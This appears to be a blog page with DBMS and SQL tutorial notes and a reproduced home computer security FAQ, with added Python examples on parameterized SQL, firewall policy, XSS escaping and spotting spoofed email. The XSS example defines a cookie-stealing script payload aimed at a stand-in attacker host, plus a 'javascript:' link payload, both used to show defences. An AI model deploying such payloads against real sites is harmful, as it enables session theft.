2.    Computer based databases: Databases created with the help of a computer are known as computer based databases.

Computer based databases are of two types:

A. Traditional file processing system
B. Database approach

What Is DBMS?
It stands for database management system. It is a software system that allows the users to define, create and manipulate database and provides a control to the database.

Components of DBMS:
1.    Hardware
2.    Software
3.    Data
4.    Procedures
5.    Users
Advantages of DBMS:
1.    Controlling Redundancy: In file system, each application has its own private files, which can’t be shared between multiple applications. This can often lead to considerable redundancy in the stored data, which results in wastage of storage space. In DBMS by having centralized database this can be avoided.
2.    Integrity can be enforced: Integrity of data means that data in database is always accurate, such that inaccurate information cannot be stored in database.
3.    Standards can be enforced: Since DBMS is a central system, so standard can be enforced easily may be at company level, department level, national level or international level.
4.    Inconsistency can be avoided: When the same data is duplicated and changes are made at one site, which is not propagated to the other site, it gives rise to inconsistency and the two entries regarding the same data will not agree. At such time the data is said to be inconsistent. So if redundancy is removed chances of having inconsistent data is also removed.
5.    Data can be shared: DBMS is a centralized system in which data can be shared by multiple applications.
Disadvantages of DBMS:
1. Complexity: The provision of the functionality that is expected of a good DBMS makes the DBMS an extremely complex piece of software.
2. Size: The complexity and breadth of functionality makes the DBMS an extremely large piece of software, occupying many megabytes of disk space and requiring substantial amount of memory to run efficiently.   
3.  Performance: Performance is slow as compared to file processing system.
4. Higher impact of failure: In DBMS system failure of any component can bring operations to a halt.
5. Cost: Cost of DBMS is very high. It varies significantly, depending on the environment and functionality provided.

Oracle

INTRODUCTION TO ORACLE


The relational model was proposed by Dr. E.F. Codd in 1970, sponsored by IBM, and became accepted as the definitive model for RDBMS. The language developed by IBM to manipulate the data stored within Codd's model was originally called Structured English Query Language (SEQUEL), with the word English later being dropped in favor of Structured Query Language (SQL).
In 1979 a company called Relational Software, Inc. released the first commercially available implementation of SQL. Relational Software later came to be known as Oracle Corporation. Oracle Corporation is a company that produces the most widely used server based, multi-user RDBMS, named Oracle.

FEATURES OF ORACLE:

1.    Very Large Memory Support:

Oracle allows a Very Large Memory (VLM) configuration on Windows 2000 and Windows XP, which allows Oracle to access more than 4GB of RAM.

2.    4GB RAM TUNING(4GT):

Window NT Server Enterprise and Datacenter Editions include a feature called 4GB RAM TUNING(4GT).This feature allows memory-intensive applications running on Oracle

3.    VLM INSTANCE TUNING:

VLM configuration improves database performance by caching more database buffers in memory.

4.    USER MIGRATION UTILITY:

A new command-line tool, User Migration Utility, simplifies conversion of local or external database users to enterprise users.

5.    ORACLE SHARED SERVER PROCESS:

It is a server configuration which allows many user processes to share very few server processes. The user processes connect to a dispatcher background process, which routes client requests to the next available shared server process.

6.    ORACLE NET MULTIPLEXING AND CONNECTION POOLING:

Oracle net multiplexing and connection pooling features allow a large configuration to connect more users to a single database instance.

7.    ORACLE REAL APPLICATION CLUSTERS:

Real Application Clusters raise connection counts dramatically by allowing multiple server computers to access the same database files, increasing the number of user connections by tens of thousands as well as increasing throughput.

DBMS SQL Queries

Command: Create

Purpose: This command is used to create tables.

Syntax:
Create table <table name> (column 1 data type<size>, column 2 data type <size>);

Example::SQL> create table student2(s_no varchar2(4), name char(15), roll_no varchar2(6), branch char(10));
 
Command: Desc

Purpose: This command is used to describe table.

Syntax: desc <table name>;

Example::
SQL> desc student2;
Name Null? Type
(column listing follows)

Command: Insert

Purpose: This command inserts values in the table.

Syntax: Insert into table name (col name 1, column name 2) values (value1, value2);

Example::
SQL> insert into student2 values (1,'AMAN', 7213,'c.s.e.');

SQL> insert into student2 values (2,'ANKIT', 7216,'c.s.e.');

SQL> insert into student2 (s_no,name,roll_no,branch) values(3,'ADITYA',7206,'c.s.e.');

Command: Select

Purpose: Retrieves columns and rows from a table; * (all columns) and distinct are the options used with it.

Syntax: Select [distinct] <tablename.columnname>
From<tablename>
[Where <condition>]
[Group by<columnname(s)>]
[Having <condition>]
[Order by <expression>];

Example::
SQL> select * from student2;

SQL> select * from student2 where name='ANKIT';

SQL> select * from student2 where s_no=3;
  Command: Alter

Purpose: This is used to modify the structure of the table.

Syntax: Alter table <table name> add (<new column> <datatype>(<size>));

Example::
SQL> alter table student2 add( address varchar2(25));

SQL> select * from student2;

SQL> alter table student2 modify( address varchar(28));

SQL> alter table student2 drop(address);

SQL> select * from student2;
  Command: Delete

Purpose: This command is used to delete either all the rows or a set of rows from a table.

Syntax: Delete from <table name>;
Delete from <table name> where <condition>;

Example::
SQL> delete from student2 where name='purneet';

SQL> select * from student2;

SQL> delete from student2;

SQL> select * from student2;
  Command: Update

Purpose: This command is used to change and modify the data values in a table.

Syntax: Update <table name> set <column name1>=<expression1>, <column name2>=<expression2> [where <condition>];

Example::
SQL> update student2 set name='AKSHAY' where s_no=3;

SQL> select * from student2;
  Command: Rename

Purpose: This command is used to rename a table.

Syntax: Rename <table name> to <new table name>;

Example::
SQL>rename student2 to student;

SQL> select * from student;
  Command: Order by command

Purpose: The ORDER BY clause sorts the result set based on the columns specified.

Syntax: Order by<column name1>, <column name2> <[sort order]>;

Example::
SQL> select * from student2 order by roll_no asc;

SQL> select * from student2 order by s_no asc;

SQL> select * from student2 order by s_no desc;
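The command sequence above (create, desc, insert, select, alter, update, delete, order by, rename) run end to end against a database, as an added example that is not part of the original page. It uses Python's built-in sqlite3 module on an in-memory database rather than Oracle, so the two Oracle-specific spellings are adjusted (`alter table ... add column` and `alter table ... rename to`), `pragma table_info` stands in for `desc`, and the student rows are constructed to match the page's inserts.

```python
import sqlite3

# Constructed sample rows modelled on the page's student2 inserts.
STUDENTS = [
    (1, "AMAN", 7213, "c.s.e."),
    (2, "ANKIT", 7216, "c.s.e."),
    (3, "ADITYA", 7206, "c.s.e."),
]


def column_names(cur, table: str) -> list:
    """SQLite's stand-in for SQL*Plus 'desc <table>'."""
    return [row[1] for row in cur.execute(f"pragma table_info({table})")]


def run_student_demo() -> dict:
    """Walk the page's command sequence and collect what each step yields."""
    con = sqlite3.connect(":memory:")
    cur = con.cursor()
    out = {}

    # create: SQLite accepts Oracle-style type names such as varchar2(4) and char(15)
    cur.execute("create table student2 (s_no varchar2(4), name char(15), "
                "roll_no varchar2(6), branch char(10))")
    out["columns"] = column_names(cur, "student2")

    # insert: values are bound to ? placeholders, never spliced into the statement text
    cur.executemany("insert into student2 (s_no, name, roll_no, branch) values (?, ?, ?, ?)",
                    STUDENTS)
    out["row_count"] = cur.execute("select count(*) from student2").fetchone()[0]

    # select with a where clause
    out["ankit"] = cur.execute("select name, branch from student2 where name = ?",
                               ("ANKIT",)).fetchall()

    # alter: add a column (SQLite spells it 'add column', without Oracle's parentheses)
    cur.execute("alter table student2 add column address varchar2(25)")
    out["columns_after_alter"] = column_names(cur, "student2")

    # update one row by key
    cur.execute("update student2 set name = ? where s_no = ?", ("AKSHAY", 3))
    out["name_of_3"] = cur.execute("select name from student2 where s_no = ?",
                                   (3,)).fetchone()[0]

    # delete a row that does not exist: no error, nothing removed
    cur.execute("delete from student2 where name = ?", ("purneet",))
    out["rows_after_delete"] = cur.execute("select count(*) from student2").fetchone()[0]

    # order by
    out["names_by_roll_desc"] = [r[0] for r in cur.execute(
        "select name from student2 order by roll_no desc")]

    # rename (Oracle: 'rename student2 to student'; SQLite: 'alter table ... rename to')
    cur.execute("alter table student2 rename to student")
    out["tables"] = [r[0] for r in cur.execute(
        "select name from sqlite_master where type = 'table'")]

    con.close()
    return out


if __name__ == "__main__":
    for step, result in run_student_demo().items():
        print(f"{step}: {result}")
```

Binding values with `?` placeholders is the idiomatic way to run these statements from a program: the database engine sees the statement text and the data separately, so a value such as a student's name can never be mistaken for part of the command.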

Thursday 27 September 2012

Computer Network Security


  • Computer security

    1. What is computer security?
       Computer security is the process of preventing and detecting unauthorized use of your computer. Prevention measures help you to stop unauthorized users (also known as "intruders") from accessing any part of your computer system. Detection helps you to determine whether or not someone attempted to break into your system, if they were successful, and what they may have done.

    2. Why should I care about computer security?
       We use computers for everything from banking and investing to shopping and communicating with others through email or chat programs. Although you may not consider your communications "top secret," you probably do not want strangers reading your email, using your computer to attack other systems, sending forged email from your computer, or examining personal information stored on your computer (such as financial statements).

    3. Who would want to break into my computer at home?
       Intruders (also referred to as hackers, attackers, or crackers) may not care about your identity. Often they want to gain control of your computer so they can use it to launch attacks on other computer systems.
       Having control of your computer gives them the ability to hide their true location as they launch attacks, often against high-profile computer systems such as government or financial systems. Even if you have a computer connected to the Internet only to play the latest games or to send email to friends and family, your computer may be a target.
       Intruders may be able to watch all your actions on the computer, or cause damage to your computer by reformatting your hard drive or changing your data.

    4. How easy is it to break into my computer?
       Unfortunately, intruders are always discovering new vulnerabilities (informally called "holes") to exploit in computer software. The complexity of software makes it increasingly difficult to thoroughly test the security of computer systems.
       When holes are discovered, computer vendors will usually develop patches to address the problem(s). However, it is up to you, the user, to obtain and install the patches, or correctly configure the software to operate more securely. Most of the incident reports of computer break-ins received at the CERT/CC could have been prevented if system administrators and users kept their computers up-to-date with patches and security fixes.
       Also, some software applications have default settings that allow other users to access your computer unless you change the settings to be more secure. Examples include chat programs that let outsiders execute commands on your computer or web browsers that could allow someone to place harmful programs on your computer that run when you click on them.

  • Technology
  • This section provides a basic introduction to the technologies that underlie the Internet. It was written with the novice end-user in mind and is not intended to be a comprehensive survey of all Internet-based technologies. Subsections provide a short overview of each topic. This section is a basic primer on the relevant technologies. For those who desire a deeper understanding of the concepts covered here, we include links to additional information.

    1. What does broadband mean?
       "Broadband" is the general term used to refer to high-speed network connections. In this context, Internet connections via cable modem and Digital Subscriber Line (DSL) are frequently referred to as broadband Internet connections. "Bandwidth" is the term used to describe the relative speed of a network connection -- for example, most current dial-up modems can support a bandwidth of 56 kbps (thousand bits per second). There is no set bandwidth threshold required for a connection to be referred to as "broadband", but it is typical for connections in excess of 1 Megabit per second (Mbps) to be so named.

    2. What is cable modem access?
       A cable modem allows a single computer (or network of computers) to connect to the Internet via the cable TV network. The cable modem usually has an Ethernet LAN (Local Area Network) connection to the computer, and is capable of speeds in excess of 5 Mbps.
       Typical speeds tend to be lower than the maximum, however, since cable providers turn entire neighborhoods into LANs which share the same bandwidth. Because of this "shared-medium" topology, cable modem users may experience somewhat slower network access during periods of peak demand, and may be more susceptible to risks such as packet sniffing and unprotected Windows shares than users with other types of connectivity. (See the "Computer security risks to home users" section of this document.)

    3. What is DSL access?
       Digital Subscriber Line (DSL) Internet connectivity, unlike cable modem-based service, provides the user with dedicated bandwidth. However, the maximum bandwidth available to DSL users is usually lower than the maximum cable modem rate because of differences in their respective network technologies. Also, the "dedicated bandwidth" is only dedicated between your home and the DSL provider's central office -- the providers offer little or no guarantee of bandwidth all the way across the Internet.
       DSL access is not as susceptible to packet sniffing as cable modem access, but many of the other security risks we'll cover apply to both DSL and cable modem access. (See the "Computer security risks to home users" section of this document.)

    4. How are broadband services different from traditional dial-up services?
       Traditional dial-up Internet services are sometimes referred to as "dial-on-demand" services. That is, your computer only connects to the Internet when it has something to send, such as email or a request to load a web page. Once there is no more data to be sent, or after a certain amount of idle time, the computer disconnects the call. Also, in most cases each call connects to a pool of modems at the ISP, and since the modem IP addresses are dynamically assigned, your computer is usually assigned a different IP address on each call. As a result, it is more difficult (not impossible, just difficult) for an attacker to take advantage of vulnerable network services to take control of your computer.
       Broadband services are referred to as "always-on" services because there is no call setup when your computer has something to send. The computer is always on the network, ready to send or receive data through its network interface card (NIC). Since the connection is always up, your computer's IP address will change less frequently (if at all), thus making it more of a fixed target for attack.
       What's more, many broadband service providers use well-known IP addresses for home users. So while an attacker may not be able to single out your specific computer as belonging to you, they may at least be able to know that your service provider's broadband customers are within a certain address range, thereby making your computer a more likely target than it might have been otherwise.
       The table below shows a brief comparison of traditional dial-up and broadband services.


       Feature                   | Dial-up                                         | Broadband
       Connection type           | Dial on demand                                  | Always on
       IP address                | Changes on each call                            | Static or infrequently changing
       Relative connection speed | Low                                             | High
       Remote control potential  | Computer must be dialed in to control remotely  | Computer is always connected, so remote control can occur anytime
       ISP-provided security     | Little or none                                  | Little or none

       Table 1: Comparison of Dial-up and Broadband Services

    5. How is broadband access different from the network I use at work?
       Corporate and government networks are typically protected by many layers of security, ranging from network firewalls to encryption. In addition, they usually have support staff who maintain the security and availability of these network connections.
       Although your ISP is responsible for maintaining the services they provide to you, you probably won't have dedicated staff on hand to manage and operate your home network. You are ultimately responsible for your own computers. As a result, it is up to you to take reasonable precautions to secure your computers from accidental or intentional misuse.

    6. What is a protocol?
       A protocol is a well-defined specification that allows computers to communicate across a network. In a way, protocols define the "grammar" that computers can use to "talk" to each other.

    7. What is IP?
       IP stands for "Internet Protocol". It can be thought of as the common language of computers on the Internet. There are a number of detailed descriptions of IP given elsewhere, so we won't cover it in detail in this document. However, it is important to know a few things about IP in order to understand how to secure your computer. Here we'll cover IP addresses, static vs. dynamic addressing, NAT, and TCP and UDP Ports.
       An overview of TCP/IP can be found in the TCP/IP Frequently Asked Questions (FAQ) at
       http://www.faqs.org/faqs/internet/tcp-ip/tcp-ip-faq/part1/
       and
       http://www.faqs.org/faqs/internet/tcp-ip/tcp-ip-faq/part2/

    8. What is an IP address?
       IP addresses are analogous to telephone numbers: when you want to call someone on the telephone, you must first know their telephone number. Similarly, when a computer on the Internet needs to send data to another computer, it must first know its IP address. IP addresses are typically shown as four numbers separated by decimal points, or "dots". For example, 10.24.254.3 and 192.168.62.231 are IP addresses.
       If you need to make a telephone call but you only know the person's name, you can look them up in the telephone directory (or call directory services) to get their telephone number. On the Internet, that directory is called the Domain Name System, or DNS for short. If you know the name of a server, say www.cert.org, and you type this into your web browser, your computer will then go ask its DNS server what the numeric IP address is that is associated with that name.
       Every computer on the Internet has an IP address associated with it that uniquely identifies it. However, that address may change over time, especially if the computer is
       • dialing into an Internet Service Provider (ISP)
       • connected behind a network firewall
       • connected to a broadband service using dynamic IP addressing.

    9. What are static and dynamic addressing?
       Static IP addressing occurs when an ISP permanently assigns one or more IP addresses for each user. These addresses do not change over time. However, if a static address is assigned but not in use, it is effectively wasted. Since ISPs have a limited number of addresses allocated to them, they sometimes need to make more efficient use of their addresses.
       Dynamic IP addressing allows the ISP to efficiently utilize their address space. Using dynamic IP addressing, the IP addresses of individual user computers may change over time. If a dynamic address is not in use, it can be automatically reassigned to another computer as needed.

    10. What is NAT?
       Network Address Translation (NAT) provides a way to hide the IP addresses of a private network from the Internet while still allowing computers on that network to access the Internet. NAT can be used in many different ways, but one method frequently used by home users is called "masquerading".
       Using NAT masquerading, one or more devices on a LAN can be made to appear as a single IP address to the outside Internet. This allows for multiple computers in a home network to use a single cable modem or DSL connection without requiring the ISP to provide more than one IP address to the user. Using this method, the ISP-assigned IP address can be either static or dynamic. Most network firewalls support NAT masquerading.

    11. What are TCP and UDP Ports?
       TCP (Transmission Control Protocol) and UDP (User Datagram Protocol) are both protocols that use IP. Whereas IP allows two computers to talk to each other across the Internet, TCP and UDP allow individual applications (also known as "services") on those computers to talk to each other.
       In the same way that a telephone number or physical mail box might be associated with more than one person, a computer might have multiple applications (e.g. email, file services, web services) running on the same IP address. Ports allow a computer to differentiate services such as email data from web data. A port is simply a number associated with each application that uniquely identifies that service on that computer. Both TCP and UDP use ports to identify services. Some common port numbers are 80 for web (HTTP), 25 for email (SMTP), and 53 for Domain Name System (DNS).

    12. What is a firewall?
       The Firewalls FAQ (http://www.faqs.org/faqs/firewalls-faq/) defines a firewall as "a system or group of systems that enforces an access control policy between two networks." In the context of home networks, a firewall typically takes one of two forms:
       • Software firewall - specialized software running on an individual computer, or
       • Network firewall - a dedicated device designed to protect one or more computers.
       Both types of firewall allow the user to define access policies for inbound connections to the computers they are protecting. Many also provide the ability to control what services (ports) the protected computers are able to access on the Internet (outbound access). Most firewalls intended for home use come with pre-configured security policies from which the user chooses, and some allow the user to customize these policies for their specific needs.
       More information on firewalls can be found in the Additional resources section of this document.
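The three ideas from the NAT, ports and firewall answers above put together in working code, as an added example that is not part of the original FAQ: a home LAN on a private address range sits behind a masquerading firewall, connections are identified by (protocol, port) exactly as the text describes, and the firewall enforces an access control policy that allows only listed outbound services and denies every inbound connection by default. The LAN range, the policy and the sample connections are constructed for the demonstration; it uses only Python's standard `ipaddress` module.

```python
import ipaddress
from dataclasses import dataclass

# Constructed home LAN sitting behind a NAT-masquerading firewall (an assumption).
HOME_LAN = ipaddress.ip_network("192.168.1.0/24")

# Services named in the text, keyed by (protocol, port).
SERVICE_NAMES = {("tcp", 80): "HTTP", ("tcp", 25): "SMTP", ("udp", 53): "DNS"}

# Policy: the LAN may reach only these services outside; nothing outside may open a
# connection inward (the default-deny inbound policy a home firewall ships with).
OUTBOUND_ALLOW = set(SERVICE_NAMES)
INBOUND_ALLOW: set = set()


@dataclass(frozen=True)
class Connection:
    src: str      # source IP address
    dst: str      # destination IP address
    proto: str    # "tcp" or "udp"
    dport: int    # destination port, which identifies the service


def direction(conn: Connection) -> str:
    """Classify a new connection relative to the protected LAN."""
    src_inside = ipaddress.ip_address(conn.src) in HOME_LAN
    dst_inside = ipaddress.ip_address(conn.dst) in HOME_LAN
    if src_inside and not dst_inside:
        return "outbound"
    if dst_inside and not src_inside:
        return "inbound"
    return "local" if src_inside and dst_inside else "transit"


def decide(conn: Connection) -> str:
    """Return 'allow' or 'deny' for the first packet of a connection."""
    kind = direction(conn)
    service = (conn.proto, conn.dport)
    if kind == "outbound":
        return "allow" if service in OUTBOUND_ALLOW else "deny"
    if kind == "inbound":
        return "allow" if service in INBOUND_ALLOW else "deny"
    if kind == "local":
        return "allow"     # traffic between LAN hosts never crosses the firewall
    return "deny"          # a home firewall does not forward Internet-to-Internet traffic


# Constructed sample connections (not captured traffic); 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges standing in for Internet hosts.
SAMPLE = [
    Connection("192.168.1.10", "203.0.113.5", "tcp", 80),     # LAN host browsing the web
    Connection("192.168.1.10", "203.0.113.53", "udp", 53),    # LAN host resolving a name
    Connection("192.168.1.10", "203.0.113.5", "tcp", 8080),   # service not in the policy
    Connection("198.51.100.7", "192.168.1.10", "tcp", 139),   # outsider probing a Windows share
    Connection("198.51.100.7", "192.168.1.10", "tcp", 80),    # outsider reaching for a web server
    Connection("192.168.1.10", "192.168.1.20", "tcp", 139),   # neighbours sharing files on the LAN
]


def evaluate(connections=SAMPLE):
    """Run every sample connection through the policy."""
    return [(direction(c), c.proto, c.dport, decide(c)) for c in connections]


if __name__ == "__main__":
    for kind, proto, port, verdict in evaluate():
        name = SERVICE_NAMES.get((proto, port), "other")
        print(f"{kind:9} {proto}/{port:<5} {name:5} -> {verdict}")
```

The fourth sample is the "unprotected Windows shares" risk the text mentions: with the default-deny inbound rule the probe from the Internet is dropped at the firewall, while the same share used between two LAN hosts is unaffected because that traffic never reaches the firewall.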

    13. What does antivirus software do?
       There are a variety of antivirus software packages that operate in many different ways, depending on how the vendor chose to implement their software. What they have in common, though, is that they all look for patterns in the files or memory of your computer that indicate the possible presence of a known virus. Antivirus packages know what to look for through the use of virus profiles (sometimes called "signatures") provided by the vendor.
       New viruses are discovered daily. The effectiveness of antivirus software is dependent on having the latest virus profiles installed on your computer so that it can look for recently discovered viruses. It is important to keep these profiles up to date.

  • Computer security risks to home users
    1. What is at risk?
       Information security is concerned with three main areas:
       • Confidentiality -- information should be available only to those who rightfully have access to it
       • Integrity -- information should be modified only by those who are authorized to do so
       • Availability -- information should be accessible to those who need it when they need it
       These concepts apply to home Internet users just as much as they would to any corporate or government network. You probably wouldn't let a stranger look through your important documents. In the same way, you may want to keep the tasks you perform on your computer confidential, whether it's tracking your investments or sending email messages to family and friends. Also, you should have some assurance that the information you enter into your computer remains intact and is available when you need it.
       Some security risks arise from the possibility of intentional misuse of your computer by intruders via the Internet. Others are risks that you would face even if you weren't connected to the Internet (e.g. hard disk failures, theft, power outages). The bad news is that you probably cannot plan for every possible risk. The good news is that you can take some simple steps to reduce the chance that you'll be affected by the most common threats -- and some of those steps help with both the intentional and accidental risks you're likely to face.
       Before we get to what you can do to protect your computer or home network, let's take a closer look at some of these risks.

    2. Intentional misuse of your computer
      The most common methods used by intruders to gain control of home computers are briefly described below. More detailed information is available by reviewing the URLs listed in the References section below.
      1. Trojan horse programs
      2. Back door and remote administration programs
      3. Denial of service
      4. Being an intermediary for another attack
      5. Unprotected Windows shares
      6. Mobile code (Java, JavaScript, and ActiveX)
      7. Cross-site scripting
      8. Email spoofing
      9. Email-borne viruses
      10. Hidden file extensions
      11. Chat clients
      12. Packet sniffing
      1. Trojan horse programs
        Trojan horse programs are a common way for intruders to trick you (sometimes referred to as "social engineering") into installing "back door" programs. These can allow intruders easy access to your computer without your knowledge, change your system configuration, or infect your computer with a computer virus. More information about Trojan horses can be found in the following document.
        http://www.cert.org/advisories/CA-1999-02.html
      2. Back door and remote administration programs
        On Windows computers, three tools commonly used by intruders to gain remote access to your computer are BackOrifice, Netbus, and SubSeven. These back door or remote administration programs, once installed, allow other people to access and control your computer.
      3. Denial of service
        Another form of attack is called a denial-of-service (DoS) attack. This type of attack causes your computer to crash or to become so busy processing data that you are unable to use it. Where the attack exploits a specific software flaw, the latest patches will usually prevent it; an attack that simply floods your connection with traffic cannot be patched away and can only be absorbed or filtered upstream. The following documents describe denial-of-service attacks in greater detail.
        http://www.cert.org/advisories/CA-2000-01.html
        http://www.cert.org/archive/pdf/DoS_trends.pdf
        It is important to note that in addition to being the target of a DoS attack, it is possible for your computer to be used as a participant in a denial-of-service attack on another system.
      4. Being an intermediary for another attack
        Intruders will frequently use compromised computers as launching pads for attacking other systems. An example of this is how distributed denial-of-service (DDoS) tools are used. The intruders install an "agent" (frequently through a Trojan horse program) that runs on the compromised computer awaiting further instructions. Then, when a number of agents are running on different computers, a single "handler" can instruct all of them to launch a denial-of-service attack on another system. Thus, the end target of the attack is not your own computer, but someone else’s -- your computer is just a convenient tool in a larger attack.
      5. Unprotected Windows shares
        Unprotected Windows networking shares can be exploited by intruders in an automated way to place tools on large numbers of Windows-based computers attached to the Internet. Because site security on the Internet is interdependent, a compromised computer not only creates problems for the computer's owner, but it is also a threat to other sites on the Internet. The greater immediate risk to the Internet community is the potentially large number of computers attached to the Internet with unprotected Windows networking shares combined with distributed attack tools such as those described in
        http://www.cert.org/incident_notes/IN-2000-01.html
        Another threat includes malicious and destructive code, such as viruses or worms, which leverage unprotected Windows networking shares to propagate. One such example is the 911 worm described in
        http://www.cert.org/incident_notes/IN-2000-03.html
        There is great potential for the emergence of other intruder tools that leverage unprotected Windows networking shares on a widespread basis.
      6. Mobile code (Java/JavaScript/ActiveX)
        There have been reports of problems with "mobile code" (e.g. Java, JavaScript, and ActiveX). These are programming languages that let web developers write code that is executed by your web browser. Although the code is generally useful, it can be used by intruders to gather information (such as which web sites you visit) or to run malicious code on your computer. It is possible to disable Java, JavaScript, and ActiveX in your web browser. We recommend that you do so if you are browsing web sites that you are not familiar with or do not trust.
        Also be aware of the risks involved in the use of mobile code within email programs. Many email programs use the same code as web browsers to display HTML. Thus, vulnerabilities that affect Java, JavaScript, and ActiveX are often applicable to email as well as web pages.
        More information on ActiveX security is available in http://www.cert.org/archive/pdf/activeX_report.pdf
      7. Cross-site scripting
        An attacker may attach a script to something sent to a web site, such as a URL, an element in a form, or a database inquiry. A site that echoes that input back into its pages without encoding it will include the script in its response. Later, when the web site responds to you, the malicious script is transferred to your browser and runs with the access that site has in your browser.
        You can potentially expose your web browser to malicious scripts by
        • following links in web pages, email messages, or newsgroup postings without knowing what they link to
        • using interactive forms on an untrustworthy site
        • viewing online discussion groups, forums, or other dynamically generated pages where users can post text containing HTML tags
        More information regarding the risks posed by malicious code in web links can be found in CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests.
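        The difference between a page that reflects input verbatim and one that encodes it, as an added Python example that is not part of the CERT document. The `render_*` helpers, the hypothetical site and both payloads are constructed for illustration. The block also goes one step beyond the text: it shows a case that entity encoding alone does not cover, a link whose URL uses the `javascript:` scheme, and the scheme allowlist that handles it.

```python
import html
from urllib.parse import urlsplit

# Constructed attacker inputs for the example (not captured from any real site).
SCRIPT_PAYLOAD = '<script>new Image().src="http://attacker.invalid/?c="+document.cookie</script>'
LINK_PAYLOAD = "javascript:alert(document.cookie)"


def render_greeting_vulnerable(name: str) -> str:
    """Reflects the request parameter verbatim: the browser parses it as markup."""
    return f"<p>Hello, {name}!</p>"


def render_greeting_escaped(name: str) -> str:
    """Entity-encodes < > & " ' so the same input is displayed as inert text."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


SAFE_SCHEMES = {"http", "https", "mailto"}


def render_link_vulnerable(url: str) -> str:
    """Escaping is right for text and attribute values, but it cannot help when
    the attribute is a URL: 'javascript:...' contains no special characters, so
    the browser still runs it when the link is clicked."""
    return f'<a href="{html.escape(url, quote=True)}">link</a>'


def render_link_checked(url: str) -> str:
    """Allowlist the URL scheme first, then escape for the attribute context."""
    url = url.strip()
    scheme = urlsplit(url).scheme.lower()
    if scheme:
        allowed = scheme in SAFE_SCHEMES
    else:
        # Scheme-less values are only accepted as same-site relative links;
        # '//host/...' is protocol-relative and would leave the site.
        allowed = url.startswith(("/", "?", "#")) and not url.startswith("//")
    if not allowed:
        url = "#"  # refuse rather than emit an executable or foreign target
    return f'<a href="{html.escape(url, quote=True)}">link</a>'


def has_raw_script_tag(page: str) -> bool:
    """Crude marker used only to compare the outputs above."""
    return "<script" in page.lower()


def has_javascript_href(page: str) -> bool:
    return 'href="javascript:' in page.lower()


if __name__ == "__main__":
    print(render_greeting_vulnerable(SCRIPT_PAYLOAD))
    print(render_greeting_escaped(SCRIPT_PAYLOAD))
    print(render_link_vulnerable(LINK_PAYLOAD))
    print(render_link_checked(LINK_PAYLOAD))
```

        The escaping function is the server-side fix; disabling scripts in the browser, as recommended later in this document, is the user-side mitigation for sites that have not applied it.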
      8. Email spoofing
        Email “spoofing” is when an email message appears to have originated from one source when it actually was sent from another source. Email spoofing is often an attempt to trick the user into making a damaging statement or releasing sensitive information (such as passwords).
        Spoofed email can range from harmless pranks to social engineering ploys. Examples of the latter include
        • email claiming to be from a system administrator requesting users to change their passwords to a specified string and threatening to suspend their account if they do not comply
        • email claiming to be from a person in authority requesting users to send them a copy of a password file or other sensitive information
        Note that while service providers may occasionally request that you change your password, they usually will not specify what you should change it to. Also, most legitimate service providers would never ask you to send them any password information via email. If you suspect that you may have received a spoofed email from someone with malicious intent, you should contact your service provider's support personnel immediately.
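        One way to turn the advice above into a check on the message itself, as an added Python example that is not part of the CERT document. Both messages are constructed for the example (documentation addresses, an invented provider `example.net`, an invented attacker host); the check assumes that the Return-Path and the topmost Received: header were written by your own mail server and so cannot be forged by the sender. Mail forwarding and mailing lists legitimately produce such mismatches, and the authoritative sender checks are SPF, DKIM and DMARC, which this document does not cover, so treat these indicators as reasons to contact your provider, not as proof.

```python
import email
import re
from email.utils import parseaddr

# Constructed messages (not real captures). The first imitates the
# "administrator demands a specific new password" ploy; the second is a
# consistent notification from the same provider.
SPOOFED_MESSAGE = """\
Return-Path: <bounce@mailer.attacker.invalid>
Received: from mailer.attacker.invalid (mailer.attacker.invalid [192.0.2.10])
\tby mx.example.net with ESMTP id 4711; Wed, 28 Nov 2012 10:00:00 +0000
From: "System Administrator" <admin@example.net>
To: user@example.net
Subject: Action required

Please change your password to Welcome123 within 24 hours or your account
will be suspended.
"""

LEGIT_MESSAGE = """\
Return-Path: <noreply@example.net>
Received: from smtp.example.net (smtp.example.net [198.51.100.5])
\tby mx.example.net with ESMTP id 4712; Wed, 28 Nov 2012 10:05:00 +0000
From: "Example Billing" <noreply@example.net>
To: user@example.net
Subject: Your statement is ready

Your monthly statement is available in your account portal.
"""


def domain_of(address: str) -> str:
    """Bare domain of an address such as '"Name" <user@host>'."""
    return parseaddr(address)[1].rpartition("@")[2].lower()


def host_in_domain(host: str, domain: str) -> bool:
    host = host.lower()
    return bool(domain) and (host == domain or host.endswith("." + domain))


def spoofing_indicators(raw_message: str) -> list:
    """Return human-readable reasons to distrust the visible From: address."""
    msg = email.message_from_string(raw_message)
    reasons = []
    from_domain = domain_of(msg.get("From", ""))

    # 1. The envelope sender (Return-Path) normally matches the From: domain.
    return_path_domain = domain_of(msg.get("Return-Path", ""))
    if return_path_domain and return_path_domain != from_domain:
        reasons.append(f"Return-Path domain {return_path_domain!r} differs "
                       f"from From: domain {from_domain!r}")

    # 2. The first Received: header is the most recent hop, written by our own
    #    server; a message claiming to be from the provider should have been
    #    handed over by one of the provider's hosts.
    received = msg.get_all("Received") or []
    if received:
        match = re.match(r"from\s+([^\s(]+)", received[0].strip(), re.IGNORECASE)
        if match and not host_in_domain(match.group(1), from_domain):
            reasons.append(f"delivered by {match.group(1)!r}, "
                           f"not a host in {from_domain!r}")

    # 3. Content of the ploy itself: dictating the new password and threatening
    #    suspension, the two signs called out in the text above.
    body = msg.get_payload() if not msg.is_multipart() else ""
    if re.search(r"change your password to\s+\S+", body, re.IGNORECASE):
        reasons.append("message dictates the exact new password")
    if re.search(r"\bsuspend(ed)?\b", body, re.IGNORECASE):
        reasons.append("message threatens account suspension")
    return reasons


if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED_MESSAGE), ("legitimate", LEGIT_MESSAGE)):
        print(label, "->", spoofing_indicators(raw) or "no indicators")
```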
      9. Email-borne viruses
        Viruses and other types of malicious code are often spread as attachments to email messages. Before opening any attachments, be sure you know the source of the attachment. It is not enough that the mail originated from an address you recognize. The Melissa virus (see References) spread precisely because it originated from a familiar address. Also, malicious code might be distributed in amusing or enticing programs.
        Many recent viruses use these social engineering techniques to spread. Examples include
        Never run a program unless you know it to be authored by a person or company that you trust. Also, don't send programs of unknown origin to your friends or coworkers simply because they are amusing -- they might contain a Trojan horse program.
      10. Hidden file extensions
